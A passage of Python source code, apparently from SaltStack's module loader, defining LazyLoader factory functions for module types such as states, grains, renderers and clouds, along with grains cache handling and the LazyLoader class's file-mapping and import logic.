def utils(opts, whitelist=None, context=None, proxy=proxy, pack_self=None):
"""
Returns the utility modules
"""
return LazyLoader(
_module_dirs(opts, "utils", ext_type_dirs="utils_dirs"),
opts,
tag="utils",
whitelist=whitelist,
pack={"__context__": context, "__proxy__": proxy or {}},
pack_self=pack_self,
)
def pillars(opts, functions, context=None):
"""
Returns the pillars modules
"""
_utils = utils(opts)
ret = LazyLoader(
_module_dirs(opts, "pillar"),
opts,
tag="pillar",
pack={"__salt__": functions, "__context__": context, "__utils__": _utils},
extra_module_dirs=_utils.module_dirs,
pack_self="__ext_pillar__",
)
return FilterDictWrapper(ret, ".ext_pillar")
def tops(opts):
"""
Returns the tops modules
"""
if "master_tops" not in opts:
return {}
whitelist = list(opts["master_tops"].keys())
ret = LazyLoader(
_module_dirs(opts, "tops", "top"), opts, tag="top", whitelist=whitelist,
)
return FilterDictWrapper(ret, ".top")
def wheels(opts, whitelist=None, context=None):
"""
Returns the wheels modules
"""
if context is None:
context = {}
return LazyLoader(
_module_dirs(opts, "wheel"),
opts,
tag="wheel",
whitelist=whitelist,
pack={"__context__": context},
)
def outputters(opts):
"""
Returns the outputters modules
:param dict opts: The Salt options dictionary
:returns: LazyLoader instance, with only outputters present in the keyspace
"""
ret = LazyLoader(
_module_dirs(opts, "output", ext_type_dirs="outputter_dirs"),
opts,
tag="output",
)
wrapped_ret = FilterDictWrapper(ret, ".output")
# TODO: this name seems terrible... __salt__ should always be execution mods
ret.pack["__salt__"] = wrapped_ret
return wrapped_ret
def serializers(opts):
"""
Returns the serializers modules
:param dict opts: The Salt options dictionary
:returns: LazyLoader instance, with only serializers present in the keyspace
"""
return LazyLoader(_module_dirs(opts, "serializers"), opts, tag="serializers",)
def eauth_tokens(opts):
"""
Returns the tokens modules
:param dict opts: The Salt options dictionary
:returns: LazyLoader instance, with only token backends present in the keyspace
"""
return LazyLoader(_module_dirs(opts, "tokens"), opts, tag="tokens",)
def auth(opts, whitelist=None):
"""
Returns the auth modules
:param dict opts: The Salt options dictionary
:returns: LazyLoader
"""
return LazyLoader(
_module_dirs(opts, "auth"),
opts,
tag="auth",
whitelist=whitelist,
pack={"__salt__": minion_mods(opts)},
)
def fileserver(opts, backends):
"""
Returns the file server modules
"""
_utils = utils(opts)
if backends is not None:
if not isinstance(backends, list):
backends = [backends]
# Make sure that the VCS backends work either with git or gitfs, hg or
# hgfs, etc.
vcs_re = re.compile("^(git|svn|hg)")
fs_re = re.compile("fs$")
vcs = []
non_vcs = []
for back in [fs_re.sub("", x) for x in backends]:
if vcs_re.match(back):
vcs.extend((back, back + "fs"))
else:
non_vcs.append(back)
backends = vcs + non_vcs
return LazyLoader(
_module_dirs(opts, "fileserver"),
opts,
tag="fileserver",
whitelist=backends,
pack={"__utils__": _utils},
extra_module_dirs=_utils.module_dirs,
)
def roster(opts, runner=None, utils=None, whitelist=None):
"""
Returns the roster modules
"""
return LazyLoader(
_module_dirs(opts, "roster"),
opts,
tag="roster",
whitelist=whitelist,
pack={"__runner__": runner, "__utils__": utils},
extra_module_dirs=utils.module_dirs if utils else None,
)
def thorium(opts, functions, runners):
"""
Load the thorium runtime modules
"""
pack = {"__salt__": functions, "__runner__": runners, "__context__": {}}
ret = LazyLoader(_module_dirs(opts, "thorium"), opts, tag="thorium", pack=pack)
ret.pack["__thorium__"] = ret
return ret
def states(
opts, functions, utils, serializers, whitelist=None, proxy=None, context=None
):
"""
Returns the state modules
:param dict opts: The Salt options dictionary
:param dict functions: A dictionary of minion modules, with module names as
keys and funcs as values.
.. code-block:: python
import salt.config
import salt.loader
__opts__ = salt.config.minion_config('/etc/salt/minion')
statemods = salt.loader.states(__opts__, None, None)
"""
if context is None:
context = {}
return LazyLoader(
_module_dirs(opts, "states"),
opts,
tag="states",
pack={
"__salt__": functions,
"__proxy__": proxy or {},
"__utils__": utils,
"__serializers__": serializers,
"__context__": context,
},
whitelist=whitelist,
extra_module_dirs=utils.module_dirs if utils else None,
pack_self="__states__",
)
def beacons(opts, functions, context=None, proxy=None):
"""
Load the beacon modules
:param dict opts: The Salt options dictionary
:param dict functions: A dictionary of minion modules, with module names as
keys and funcs as values.
"""
return LazyLoader(
_module_dirs(opts, "beacons"),
opts,
tag="beacons",
pack={"__context__": context, "__salt__": functions, "__proxy__": proxy or {}},
virtual_funcs=[],
)
def log_handlers(opts):
"""
Returns the custom logging handler modules
:param dict opts: The Salt options dictionary
"""
ret = LazyLoader(
_module_dirs(
opts,
"log_handlers",
int_type="handlers",
base_path=os.path.join(SALT_BASE_PATH, "log"),
),
opts,
tag="log_handlers",
)
return FilterDictWrapper(ret, ".setup_handlers")
def ssh_wrapper(opts, functions=None, context=None):
"""
Returns the custom logging handler modules
"""
return LazyLoader(
_module_dirs(
opts,
"wrapper",
base_path=os.path.join(SALT_BASE_PATH, os.path.join("client", "ssh")),
),
opts,
tag="wrapper",
pack={
"__salt__": functions,
# "__grains__": opts.get("grains", {}),
# "__pillar__": opts.get("pillar", {}),
"__context__": context,
},
)
def render(opts, functions, states=None, proxy=None, context=None):
"""
Returns the render modules
"""
if context is None:
context = {}
pack = {
"__salt__": functions,
"__grains__": opts.get("grains", {}),
"__context__": context,
}
if states:
pack["__states__"] = states
if proxy is None:
proxy = {}
pack["__proxy__"] = proxy
ret = LazyLoader(
_module_dirs(opts, "renderers", "render", ext_type_dirs="render_dirs",),
opts,
tag="render",
pack=pack,
)
rend = FilterDictWrapper(ret, ".render")
if not check_render_pipe_str(
opts["renderer"], rend, opts["renderer_blacklist"], opts["renderer_whitelist"]
):
err = (
"The renderer {} is unavailable, this error is often because "
"the needed software is unavailable".format(opts["renderer"])
)
log.critical(err)
raise LoaderError(err)
return rend
def grain_funcs(opts, proxy=None, context=None):
"""
Returns the grain functions
.. code-block:: python
import salt.config
import salt.loader
__opts__ = salt.config.minion_config('/etc/salt/minion')
grainfuncs = salt.loader.grain_funcs(__opts__)
"""
_utils = utils(opts, proxy=proxy)
pack = {"__utils__": utils(opts, proxy=proxy), "__context__": context}
ret = LazyLoader(
_module_dirs(opts, "grains", "grain", ext_type_dirs="grains_dirs",),
opts,
tag="grains",
extra_module_dirs=_utils.module_dirs,
pack=pack,
)
ret.pack["__utils__"] = _utils
return ret
def _format_cached_grains(cached_grains):
"""
Returns cached grains with fixed types, like tuples.
"""
if cached_grains.get("osrelease_info"):
osrelease_info = cached_grains["osrelease_info"]
if isinstance(osrelease_info, list):
cached_grains["osrelease_info"] = tuple(osrelease_info)
return cached_grains
def _load_cached_grains(opts, cfn):
"""
Returns the grains cached in cfn, or None if the cache is too old or is
corrupted.
"""
if not os.path.isfile(cfn):
log.debug("Grains cache file does not exist.")
return None
grains_cache_age = int(time.time() - os.path.getmtime(cfn))
if grains_cache_age > opts.get("grains_cache_expiration", 300):
log.debug(
"Grains cache last modified %s seconds ago and cache "
"expiration is set to %s. Grains cache expired. "
"Refreshing.",
grains_cache_age,
opts.get("grains_cache_expiration", 300),
)
return None
if opts.get("refresh_grains_cache", False):
log.debug("refresh_grains_cache requested, Refreshing.")
return None
log.debug("Retrieving grains from cache")
try:
serial = salt.payload.Serial(opts)
with salt.utils.files.fopen(cfn, "rb") as fp_:
cached_grains = salt.utils.data.decode(
serial.load(fp_), preserve_tuples=True
)
if not cached_grains:
log.debug("Cached grains are empty, cache might be corrupted. Refreshing.")
return None
return _format_cached_grains(cached_grains)
except OSError:
return None
def grains(opts, force_refresh=False, proxy=None, context=None):
"""
Return the functions for the dynamic grains and the values for the static
grains.
Since grains are computed early in the startup process, grains functions
do not have __salt__ or __proxy__ available. At proxy-minion startup,
this function is called with the proxymodule LazyLoader object so grains
functions can communicate with their controlled device.
.. code-block:: python
import salt.config
import salt.loader
__opts__ = salt.config.minion_config('/etc/salt/minion')
__grains__ = salt.loader.grains(__opts__)
print __grains__['id']
"""
# Need to re-import salt.config, somehow it got lost when a minion is starting
import salt.config
# if we have no grains, lets try loading from disk (TODO: move to decorator?)
cfn = os.path.join(opts["cachedir"], "grains.cache.p")
if not force_refresh and opts.get("grains_cache", False):
cached_grains = _load_cached_grains(opts, cfn)
if cached_grains:
return cached_grains
else:
log.debug("Grains refresh requested. Refreshing grains.")
if opts.get("skip_grains", False):
return {}
grains_deep_merge = opts.get("grains_deep_merge", False) is True
if "conf_file" in opts:
pre_opts = {}
pre_opts.update(
salt.config.load_config(
opts["conf_file"],
"SALT_MINION_CONFIG",
salt.config.DEFAULT_MINION_OPTS["conf_file"],
)
)
default_include = pre_opts.get("default_include", opts["default_include"])
include = pre_opts.get("include", [])
pre_opts.update(
salt.config.include_config(
default_include, opts["conf_file"], verbose=False
)
)
pre_opts.update(
salt.config.include_config(include, opts["conf_file"], verbose=True)
)
if "grains" in pre_opts:
opts["grains"] = pre_opts["grains"]
else:
opts["grains"] = {}
else:
opts["grains"] = {}
grains_data = {}
blist = opts.get("grains_blacklist", [])
funcs = grain_funcs(opts, proxy=proxy, context=context or {})
if force_refresh: # if we refresh, lets reload grain modules
funcs.clear()
# Run core grains
for key in funcs:
if not key.startswith("core."):
continue
log.trace("Loading %s grain", key)
ret = funcs[key]()
if not isinstance(ret, dict):
continue
if blist:
for key in list(ret):
for block in blist:
if salt.utils.stringutils.expr_match(key, block):
del ret[key]
log.trace("Filtering %s grain", key)
if not ret:
continue
if grains_deep_merge:
salt.utils.dictupdate.update(grains_data, ret)
else:
grains_data.update(ret)
# Run the rest of the grains
for key in funcs:
if key.startswith("core.") or key == "_errors":
continue
try:
# Grains are loaded too early to take advantage of the injected
# __proxy__ variable. Pass an instance of that LazyLoader
# here instead to grains functions if the grains functions take
# one parameter. Then the grains can have access to the
# proxymodule for retrieving information from the connected
# device.
log.trace("Loading %s grain", key)
parameters = salt.utils.args.get_function_argspec(funcs[key]).args
kwargs = {}
if "proxy" in parameters:
kwargs["proxy"] = proxy
if "grains" in parameters:
kwargs["grains"] = grains_data
ret = funcs[key](**kwargs)
except Exception: # pylint: disable=broad-except
if salt.utils.platform.is_proxy():
log.info(
"The following CRITICAL message may not be an error; the proxy may not be completely established yet."
)
log.critical(
"Failed to load grains defined in grain file %s in "
"function %s, error:\n",
key,
funcs[key],
exc_info=True,
)
continue
if not isinstance(ret, dict):
continue
if blist:
for key in list(ret):
for block in blist:
if salt.utils.stringutils.expr_match(key, block):
del ret[key]
log.trace("Filtering %s grain", key)
if not ret:
continue
if grains_deep_merge:
salt.utils.dictupdate.update(grains_data, ret)
else:
grains_data.update(ret)
if opts.get("proxy_merge_grains_in_module", True) and proxy:
try:
proxytype = proxy.opts["proxy"]["proxytype"]
if proxytype + ".grains" in proxy:
if (
proxytype + ".initialized" in proxy
and proxy[proxytype + ".initialized"]()
):
try:
proxytype = proxy.opts["proxy"]["proxytype"]
ret = proxy[proxytype + ".grains"]()
if grains_deep_merge:
salt.utils.dictupdate.update(grains_data, ret)
else:
grains_data.update(ret)
except Exception: # pylint: disable=broad-except
log.critical(
"Failed to run proxy's grains function!", exc_info=True
)
except KeyError:
pass
grains_data.update(opts["grains"])
# Write cache if enabled
if opts.get("grains_cache", False):
with salt.utils.files.set_umask(0o077):
try:
if salt.utils.platform.is_windows():
# Late import
import salt.modules.cmdmod
# Make sure cache file isn't read-only
salt.modules.cmdmod._run_quiet('attrib -R "{}"'.format(cfn))
with salt.utils.files.fopen(cfn, "w+b") as fp_:
try:
serial = salt.payload.Serial(opts)
serial.dump(grains_data, fp_)
except TypeError as e:
log.error("Failed to serialize grains cache: %s", e)
raise # re-throw for cleanup
except Exception as e: # pylint: disable=broad-except
log.error("Unable to write to grains cache file %s: %s", cfn, e)
# Based on the original exception, the file may or may not have been
# created. If it was, we will remove it now, as the exception means
# the serialized data is not to be trusted, no matter what the
# exception is.
if os.path.isfile(cfn):
os.unlink(cfn)
if grains_deep_merge:
salt.utils.dictupdate.update(grains_data, opts["grains"])
else:
grains_data.update(opts["grains"])
return salt.utils.data.decode(grains_data, preserve_tuples=True)
# TODO: get rid of? Does anyone use this? You should use raw() instead
def call(fun, **kwargs):
"""
Directly call a function inside a loader directory
"""
args = kwargs.get("args", [])
dirs = kwargs.get("dirs", [])
funcs = LazyLoader(
[os.path.join(SALT_BASE_PATH, "modules")] + dirs,
None,
tag="modules",
virtual_enable=False,
)
return funcs[fun](*args)
def runner(opts, utils=None, context=None, whitelist=None):
"""
Directly call a function inside a loader directory
"""
if utils is None:
utils = {}
if context is None:
context = {}
return LazyLoader(
_module_dirs(opts, "runners", "runner", ext_type_dirs="runner_dirs"),
opts,
tag="runners",
pack={"__utils__": utils, "__context__": context},
whitelist=whitelist,
extra_module_dirs=utils.module_dirs if utils else None,
# TODO: change from __salt__ to something else, we overload __salt__ too much
pack_self="__salt__",
)
def queues(opts):
"""
Directly call a function inside a loader directory
"""
return LazyLoader(
_module_dirs(opts, "queues", "queue", ext_type_dirs="queue_dirs"),
opts,
tag="queues",
)
def sdb(opts, functions=None, whitelist=None, utils=None):
"""
Make a very small database call
"""
if utils is None:
utils = {}
return LazyLoader(
_module_dirs(opts, "sdb"),
opts,
tag="sdb",
pack={
"__sdb__": functions,
"__utils__": utils,
"__salt__": minion_mods(opts, utils=utils),
},
whitelist=whitelist,
extra_module_dirs=utils.module_dirs if utils else None,
)
def pkgdb(opts):
"""
Return modules for SPM's package database
.. versionadded:: 2015.8.0
"""
return LazyLoader(
_module_dirs(opts, "pkgdb", base_path=os.path.join(SALT_BASE_PATH, "spm")),
opts,
tag="pkgdb",
)
def pkgfiles(opts):
"""
Return modules for SPM's file handling
.. versionadded:: 2015.8.0
"""
return LazyLoader(
_module_dirs(opts, "pkgfiles", base_path=os.path.join(SALT_BASE_PATH, "spm")),
opts,
tag="pkgfiles",
)
def clouds(opts):
"""
Return the cloud functions
"""
_utils = salt.loader.utils(opts)
# Let's bring __active_provider_name__, defaulting to None, to all cloud
# drivers. This will get temporarily updated/overridden with a context
# manager when needed.
functions = LazyLoader(
_module_dirs(
opts,
"clouds",
"cloud",
base_path=os.path.join(SALT_BASE_PATH, "cloud"),
int_type="clouds",
),
opts,
tag="clouds",
pack={"__utils__": _utils, "__active_provider_name__": None},
extra_module_dirs=_utils.module_dirs,
)
for funcname in LIBCLOUD_FUNCS_NOT_SUPPORTED:
log.trace(
"'%s' has been marked as not supported. Removing from the "
"list of supported cloud functions",
funcname,
)
functions.pop(funcname, None)
return functions
def netapi(opts):
"""
Return the network api functions
"""
return LazyLoader(_module_dirs(opts, "netapi"), opts, tag="netapi",)
def executors(opts, functions=None, context=None, proxy=None):
"""
Returns the executor modules
"""
if proxy is None:
proxy = {}
if context is None:
context = {}
return LazyLoader(
_module_dirs(opts, "executors", "executor"),
opts,
tag="executor",
pack={"__salt__": functions, "__context__": context, "__proxy__": proxy},
pack_self="__executors__",
)
def cache(opts, serial):
"""
Returns the returner modules
"""
return LazyLoader(
_module_dirs(opts, "cache", "cache"),
opts,
tag="cache",
pack={"__context__": {"serial": serial}},
)
def _generate_module(name):
if name in sys.modules:
return
code = "'''Salt loaded {} parent module'''".format(name.split(".")[-1])
# ModuleType can't accept a unicode type on PY2
module = types.ModuleType(str(name)) # future lint: disable=blacklisted-function
exec(code, module.__dict__)
sys.modules[name] = module
def _mod_type(module_path):
if module_path.startswith(SALT_BASE_PATH):
return "int"
return "ext"
# TODO: move somewhere else?
class FilterDictWrapper(MutableMapping):
"""
Create a dict which wraps another dict with a specific key suffix on get
This is to replace "filter_load"
"""
def __init__(self, d, suffix):
self._dict = d
self.suffix = suffix
def __setitem__(self, key, val):
self._dict[key] = val
def __delitem__(self, key):
del self._dict[key]
def __getitem__(self, key):
return self._dict[key + self.suffix]
def __len__(self):
return len(self._dict)
def __iter__(self):
for key in self._dict:
if key.endswith(self.suffix):
yield key.replace(self.suffix, "")
class LoadedFunc:
"""
The functions loaded by LazyLoader instances using subscript notation
'a[k]' will be wrapped with LoadedFunc.
- Makes sure functions are called with the correct loader's context.
- Provides access to a wrapped func's __global__ attribute
:param func callable: The callable to wrap.
:param dict loader: The loader to use in the context when the wrapped callable is called.
"""
def __init__(self, func, loader):
self.func = func
self.loader = loader
functools.update_wrapper(self, func)
def __getattr__(self, name):
return getattr(self.func, name)
def __call__(self, *args, **kwargs):
if self.loader.inject_globals:
run_func = global_injector_decorator(self.loader.inject_globals)(self.func)
else:
run_func = self.func
return self.loader.run(run_func, *args, **kwargs)
class LoadedMod:
def __init__(self, mod, loader):
"""
Return the wrapped func's globals via this object's __globals__
attribute.
"""
self.mod = mod
self.loader = loader
def __getattr__(self, name):
"""
Run the wrapped function in the loader's context.
"""
attr = getattr(self.mod, name)
if inspect.isfunction(attr) or inspect.ismethod(attr):
return LoadedFunc(attr, self.loader)
return attr
class LazyLoader(salt.utils.lazy.LazyDict):
"""
A pseduo-dictionary which has a set of keys which are the
name of the module and function, delimited by a dot. When
the value of the key is accessed, the function is then loaded
from disk and into memory.
.. note::
Iterating over keys will cause all modules to be loaded.
:param list module_dirs: A list of directories on disk to search for modules
:param dict opts: The salt options dictionary.
:param str tag: The tag for the type of module to load
:param func mod_type_check: A function which can be used to verify files
:param dict pack: A dictionary of function to be packed into modules as they are loaded
:param list whitelist: A list of modules to whitelist
:param bool virtual_enable: Whether or not to respect the __virtual__ function when loading modules.
:param str virtual_funcs: The name of additional functions in the module to call to verify its functionality.
If not true, the module will not load.
:param list extra_module_dirs: A list of directories that will be able to import from
:param str pack_self: Pack this module into a variable by this name into modules loaded
:returns: A LazyLoader object which functions as a dictionary. Keys are 'module.function' and values
are function references themselves which are loaded on-demand.
# TODO:
- move modules_max_memory into here
- singletons (per tag)
"""
mod_dict_class = salt.utils.odict.OrderedDict
def __init__(
self,
module_dirs,
opts=None,
tag="module",
loaded_base_name=None,
mod_type_check=None,
pack=None,
whitelist=None,
virtual_enable=True,
static_modules=None,
proxy=None,
virtual_funcs=None,
extra_module_dirs=None,
pack_self=None,
): # pylint: disable=W0231
"""
In pack, if any of the values are None they will be replaced with an
empty context-specific dict
"""
self.parent_loader = None
self.inject_globals = {}
self.pack = {} if pack is None else pack
for i in self.pack:
if isinstance(self.pack[i], salt.loader_context.NamedLoaderContext):
self.pack[i] = self.pack[i].value()
if opts is None:
opts = {}
threadsafety = not opts.get("multiprocessing")
self.context_dict = salt.utils.context.ContextDict(threadsafe=threadsafety)
self.opts = self.__prep_mod_opts(opts)
self.pack_self = pack_self
self.module_dirs = module_dirs
self.tag = tag
self._gc_finalizer = None
if loaded_base_name and loaded_base_name != LOADED_BASE_NAME:
self.loaded_base_name = loaded_base_name
else:
self.loaded_base_name = LOADED_BASE_NAME
self.mod_type_check = mod_type_check or _mod_type
if "__context__" not in self.pack:
self.pack["__context__"] = None
for k, v in self.pack.items():
if v is None: # if the value of a pack is None, lets make an empty dict
self.context_dict.setdefault(k, {})
self.pack[k] = salt.utils.context.NamespacedDictWrapper(
self.context_dict, k
)
self.whitelist = whitelist
self.virtual_enable = virtual_enable
self.initial_load = True
# names of modules that we don't have (errors, __virtual__, etc.)
self.missing_modules = {} # mapping of name -> error
self.loaded_modules = {} # mapping of module_name -> dict_of_functions
self.loaded_files = set() # TODO: just remove them from file_mapping?
self.static_modules = static_modules if static_modules else []
if virtual_funcs is None:
virtual_funcs = []
self.virtual_funcs = virtual_funcs
self.extra_module_dirs = extra_module_dirs if extra_module_dirs else []
self._clean_module_dirs = []
self.disabled = set(
self.opts.get(
"disable_{}{}".format(self.tag, "" if self.tag[-1] == "s" else "s"), [],
)
)
# A map of suffix to description for imp
self.suffix_map = {}
# A list to determine precedence of extensions
# Prefer packages (directories) over modules (single files)!
self.suffix_order = [""]
for (suffix, mode, kind) in SUFFIXES:
self.suffix_map[suffix] = (suffix, mode, kind)
self.suffix_order.append(suffix)
self._lock = threading.RLock()
with self._lock:
self._refresh_file_mapping()
super().__init__() # late init the lazy loader
# create all of the import namespaces
_generate_module("{}.int".format(self.loaded_base_name))
_generate_module("{}.int.{}".format(self.loaded_base_name, tag))
_generate_module("{}.ext".format(self.loaded_base_name))
_generate_module("{}.ext.{}".format(self.loaded_base_name, tag))
def clean_modules(self):
"""
Clean modules
"""
for name in list(sys.modules):
if name.startswith(self.loaded_base_name):
del sys.modules[name]
def __getitem__(self, item):
"""
Override the __getitem__ in order to decorate the returned function if we need
to last-minute inject globals
"""
func = super().__getitem__(item)
return LoadedFunc(func, self)
def __getattr__(self, mod_name):
"""
Allow for "direct" attribute access-- this allows jinja templates to
access things like `salt.test.ping()`
"""
if mod_name in ("__getstate__", "__setstate__"):
return object.__getattribute__(self, mod_name)
# if we have an attribute named that, lets return it.
try:
return object.__getattr__(self, mod_name) # pylint: disable=no-member
except AttributeError:
pass
# otherwise we assume its jinja template access
if mod_name not in self.loaded_modules and not self.loaded:
for name in self._iter_files(mod_name):
if name in self.loaded_files:
continue
# if we got what we wanted, we are done
if self._load_module(name) and mod_name in self.loaded_modules:
break
if mod_name in self.loaded_modules:
return LoadedMod(self.loaded_modules[mod_name], self)
else:
raise AttributeError(mod_name)
def missing_fun_string(self, function_name):
"""
Return the error string for a missing function.
This can range from "not available' to "__virtual__" returned False
"""
mod_name = function_name.split(".")[0]
if mod_name in self.loaded_modules:
return "'{}' is not available.".format(function_name)
else:
try:
reason = self.missing_modules[mod_name]
except KeyError:
return "'{}' is not available.".format(function_name)
else:
if reason is not None:
return "'{}' __virtual__ returned False: {}".format(
mod_name, reason
)
else:
return "'{}' __virtual__ returned False".format(mod_name)
def _refresh_file_mapping(self):
"""
refresh the mapping of the FS on disk
"""
# map of suffix to description for imp
if (
self.opts.get("cython_enable", True) is True
and ".pyx" not in self.suffix_map
):
try:
global pyximport
pyximport = __import__("pyximport") # pylint: disable=import-error
pyximport.install()
# add to suffix_map so file_mapping will pick it up
self.suffix_map[".pyx"] = tuple()
if ".pyx" not in self.suffix_order:
self.suffix_order.append(".pyx")
except ImportError:
log.info(
"Cython is enabled in the options but not present "
"in the system path. Skipping Cython modules."
)
# Allow for zipimport of modules
if (
self.opts.get("enable_zip_modules", True) is True
and ".zip" not in self.suffix_map
):
self.suffix_map[".zip"] = tuple()
if ".zip" not in self.suffix_order:
self.suffix_order.append(".zip")
# allow for module dirs
self.suffix_map[""] = ("", "", MODULE_KIND_PKG_DIRECTORY)
# create mapping of filename (without suffix) to (path, suffix)
# The files are added in order of priority, so order *must* be retained.
self.file_mapping = salt.utils.odict.OrderedDict()
opt_match = []
def _replace_pre_ext(obj):
"""
Hack so we can get the optimization level that we replaced (if
any) out of the re.sub call below. We use a list here because
it is a persistent data structure that we will be able to
access after re.sub is called.
"""
opt_match.append(obj)
return ""
for mod_dir in self.module_dirs:
try:
# Make sure we have a sorted listdir in order to have
# expectable override results
files = sorted(x for x in os.listdir(mod_dir) if x != "__pycache__")
except OSError:
continue # Next mod_dir
try:
pycache_files = [
os.path.join("__pycache__", x)
for x in sorted(os.listdir(os.path.join(mod_dir, "__pycache__")))
]
except OSError:
pass
else:
files.extend(pycache_files)
for filename in files:
try:
dirname, basename = os.path.split(filename)
if basename.startswith("_"):
# skip private modules
# log messages omitted for obviousness
continue # Next filename
f_noext, ext = os.path.splitext(basename)
f_noext = PY3_PRE_EXT.sub(_replace_pre_ext, f_noext)
try:
opt_level = int(opt_match.pop().group(1).rsplit("-", 1)[-1])
except (AttributeError, IndexError, ValueError):
# No regex match or no optimization level matched
opt_level = 0
try:
opt_index = self.opts["optimization_order"].index(opt_level)
except KeyError:
log.trace(
"Disallowed optimization level %d for module "
"name '%s', skipping. Add %d to the "
"'optimization_order' config option if you "
"do not want to ignore this optimization "
"level.",
opt_level,
f_noext,
opt_level,
)
continue
# make sure it is a suffix we support
if ext not in self.suffix_map:
continue # Next filename
if f_noext in self.disabled:
log.trace(
"Skipping %s, it is disabled by configuration", filename
)
continue # Next filename
fpath = os.path.join(mod_dir, filename)
# if its a directory, lets allow us to load that
if ext == "":
# is there something __init__?
subfiles = os.listdir(fpath)
for suffix in self.suffix_order:
if "" == suffix:
continue # Next suffix (__init__ must have a suffix)
init_file = "__init__{}".format(suffix)
if init_file in subfiles:
break
else:
continue # Next filename
try:
curr_ext = self.file_mapping[f_noext][1]
curr_opt_index = self.file_mapping[f_noext][2]
except KeyError:
pass
else:
if "" in (curr_ext, ext) and curr_ext != ext:
log.error(
"Module/package collision: '%s' and '%s'",
fpath,
self.file_mapping[f_noext][0],
)
if six.PY3 and ext == ".pyc" and curr_ext == ".pyc":
# Check the optimization level
if opt_index >= curr_opt_index:
# Module name match, but a higher-priority
# optimization level was already matched, skipping.
continue
elif not curr_ext or self.suffix_order.index(
ext
) >= self.suffix_order.index(curr_ext):
# Match found but a higher-priorty match already
# exists, so skip this.
continue
if six.PY3 and not dirname and ext == ".pyc":
# On Python 3, we should only load .pyc files from the
# __pycache__ subdirectory (i.e. when dirname is not an
# empty string).
continue
# Made it this far - add it
self.file_mapping[f_noext] = (fpath, ext, opt_index)
except OSError:
continue
for smod in self.static_modules:
f_noext = smod.split(".")[-1]
self.file_mapping[f_noext] = (smod, ".o", 0)
def clear(self):
"""
Clear the dict
"""
with self._lock:
super().clear() # clear the lazy loader
self.loaded_files = set()
self.missing_modules = {}
self.loaded_modules = {}
# if we have been loaded before, lets clear the file mapping since
# we obviously want a re-do
if hasattr(self, "opts"):
self._refresh_file_mapping()
self.initial_load = False
def __prep_mod_opts(self, opts):
"""
Strip out of the opts any logger instance
"""
if "__grains__" not in self.pack:
grains = opts.get("grains", {})
if isinstance(grains, salt.loader_context.NamedLoaderContext):
grains = grains.value()
self.context_dict["grains"] = grains
self.pack["__grains__"] = salt.utils.context.NamespacedDictWrapper(
self.context_dict, "grains"
)
if "__pillar__" not in self.pack:
pillar = opts.get("pillar", {})
if isinstance(pillar, salt.loader_context.NamedLoaderContext):
pillar = pillar.value()
self.context_dict["pillar"] = pillar
self.pack["__pillar__"] = salt.utils.context.NamespacedDictWrapper(
self.context_dict, "pillar"
)
mod_opts = {}
for key, val in list(opts.items()):
if key == "logger":
continue
mod_opts[key] = val
return mod_opts
def _iter_files(self, mod_name):
"""
Iterate over all file_mapping files in order of closeness to mod_name
"""
# do we have an exact match?
if mod_name in self.file_mapping:
yield mod_name
# do we have a partial match?
for k in self.file_mapping:
if mod_name in k:
yield k
# anyone else? Bueller?
for k in self.file_mapping:
if mod_name not in k:
yield k
def _reload_submodules(self, mod):
submodules = (
getattr(mod, sname)
for sname in dir(mod)
if isinstance(getattr(mod, sname), mod.__class__)
)
# reload only custom "sub"modules
for submodule in submodules:
# it is a submodule if the name is in a namespace under mod
if submodule.__name__.startswith(mod.__name__ + "."):
reload_module(submodule)
self._reload_submodules(submodule)
def __populate_sys_path(self):
for directory in self.extra_module_dirs:
if directory not in sys.path:
sys.path.append(directory)
self._clean_module_dirs.append(directory)
def __clean_sys_path(self):
invalidate_path_importer_cache = False
for directory in self._clean_module_dirs:
if directory in sys.path:
sys.path.remove(directory)
invalidate_path_importer_cache = True
self._clean_module_dirs = []
# Be sure that sys.path_importer_cache do not contains any
# invalid FileFinder references
importlib.invalidate_caches()
# Because we are mangling with importlib, we can find from
# time to time an invalidation issue with
# sys.path_importer_cache, that requires the removal of
# FileFinder that remain None for the extra_module_dirs
if invalidate_path_importer_cache:
for directory in self.extra_module_dirs:
if (
directory in sys.path_importer_cache
and sys.path_importer_cache[directory] is None
):
del sys.path_importer_cache[directory]
def _load_module(self, name):
mod = None
fpath, suffix = self.file_mapping[name][:2]
# if the fpath has `.cpython-3x` in it, but the running Py version
# is 3.y, the following will cause us to return immediately and we won't try to import this .pyc.
# This is for the unusual case where several Python versions share a single
# source tree and drop their .pycs in the same __pycache__ folder.
# If we were to load a .pyc for another Py version it's not a big problem
# but the log will get spammed with "Bad Magic Number" messages that
# can be very misleading if the user is debugging another problem.
try:
(implementation_tag, cache_tag_ver) = sys.implementation.cache_tag.split(
"-"
)
if cache_tag_ver not in fpath and implementation_tag in fpath:
log.trace(
"Trying to load %s on %s, returning False.",
fpath,
sys.implementation.cache_tag,
)
return False
except AttributeError:
# Most likely Py 2.7 or some other Python version we don't really support
pass
self.loaded_files.add(name)
fpath_dirname = os.path.dirname(fpath)
try:
self.__populate_sys_path()
sys.path.append(fpath_dirname)
if suffix == ".pyx":
mod = pyximport.load_module(name, fpath, tempfile.gettempdir())
elif suffix == ".o":
top_mod = __import__(fpath, globals(), locals(), [])
comps = fpath.split(".")
if len(comps) < 2:
mod = top_mod
else:
mod = top_mod
for subname in comps[1:]:
mod = getattr(mod, subname)
elif suffix == ".zip":
mod = zipimporter(fpath).load_module(name)
else:
desc = self.suffix_map[suffix]
# if it is a directory, we don't open a file
try:
mod_namespace = ".".join(
(
self.loaded_base_name,
self.mod_type_check(fpath),
self.tag,
name,
)
)
except TypeError:
mod_namespace = "{}.{}.{}.{}".format(
self.loaded_base_name,
self.mod_type_check(fpath),
self.tag,
name,
)
if suffix == "":
# pylint: disable=no-member
# Package directory, look for __init__
loader_details = [
(
importlib.machinery.SourceFileLoader,
importlib.machinery.SOURCE_SUFFIXES,
),
(
importlib.machinery.SourcelessFileLoader,
importlib.machinery.BYTECODE_SUFFIXES,
),
(
importlib.machinery.ExtensionFileLoader,
importlib.machinery.EXTENSION_SUFFIXES,
),
]
file_finder = importlib.machinery.FileFinder(
fpath_dirname, *loader_details
)
spec = file_finder.find_spec(mod_namespace)
if spec is None:
raise ImportError()
# TODO: Get rid of load_module in favor of
# exec_module below. load_module is deprecated, but
# loading using exec_module has been causing odd things
# with the magic dunders we pack into the loaded
# modules, most notably with salt-ssh's __opts__.
mod = spec.loader.load_module()
# mod = importlib.util.module_from_spec(spec)
# spec.loader.exec_module(mod)
# pylint: enable=no-member
sys.modules[mod_namespace] = mod
# reload all submodules if necessary
if not self.initial_load:
self._reload_submodules(mod)
